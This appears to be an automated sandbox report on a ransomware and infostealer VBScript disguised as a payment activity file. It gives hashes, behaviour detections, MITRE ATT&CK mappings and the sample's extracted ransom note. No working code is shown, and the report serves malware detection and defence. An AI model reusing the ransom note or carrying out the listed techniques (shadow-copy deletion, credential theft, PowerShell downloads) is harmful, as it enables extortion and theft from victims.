Overview

overview

10

Static

static

1

Payment_Ac...30.vbs

windows7-x64

8

Payment_Ac...30.vbs

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Payment_Activity_0037_2025-3-30.vbs

  • Size

    13KB

  • Sample

    250330-w6n9zatycw

  • MD5

    1666b10f8f85c81a689e60018dd65abf

  • SHA1

    40320e7700630bc0e35a11cc803cfa3ad46aa79b

  • SHA256

    eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

  • SHA512

    0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc

  • SSDEEP

    192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

Score
10/10
credential_accessdefense_evasiondiscoveryexecutionimpactpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decrypt_files.txt

Ransom Note
ATTENTION! You can return your files! All your files are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and key. Do not try to recover your files without a decrypt tool or try to turn off your pc, this may damage your files making them making them impossible to recover. We advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :937CC8CA764AA78A070CDC80208FC56AD226E76957AD724BE0BB6FF4FD9C0427

Targets

    • Target

      Payment_Activity_0037_2025-3-30.vbs

    • Size

      13KB

    • MD5

      1666b10f8f85c81a689e60018dd65abf

    • SHA1

      40320e7700630bc0e35a11cc803cfa3ad46aa79b

    • SHA256

      eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

    • SHA512

      0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc

    • SSDEEP

      192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

    Score
    10/10
    discoveryexecutioncredential_accessdefense_evasionimpactpersistenceransomwarespywarestealer

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

      ransomwaredefense_evasionimpactexecution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

      execution

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

      execution

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Credentials from Password Stores: Windows Credential Manager

      Suspicious access to Credentials History.

      credential_accessstealer

    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Adds Run key to start application

      persistence

    • Drops desktop.ini file(s)

    • Indicator Removal: File Deletion

      Adversaries may delete files left behind by the actions of their intrusion activity.

      defense_evasion

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2
T1059

PowerShell

2
T1059.001

Windows Management Instrumentation

1
T1047

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Hide Artifacts

1
T1564

Ignore Process Interrupts

1
T1564.011

Indicator Removal

2
T1070

File Deletion

2
T1070.004

Modify Registry

1
T1112

Credential Access

Credentials from Password Stores

2
T1555

Credentials from Web Browsers

1
T1555.003

Windows Credential Manager

1
T1555.004

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

3
T1012

System Information Discovery

4
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Data from Local System

1
T1005

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Inhibit System Recovery

1
T1490

Tasks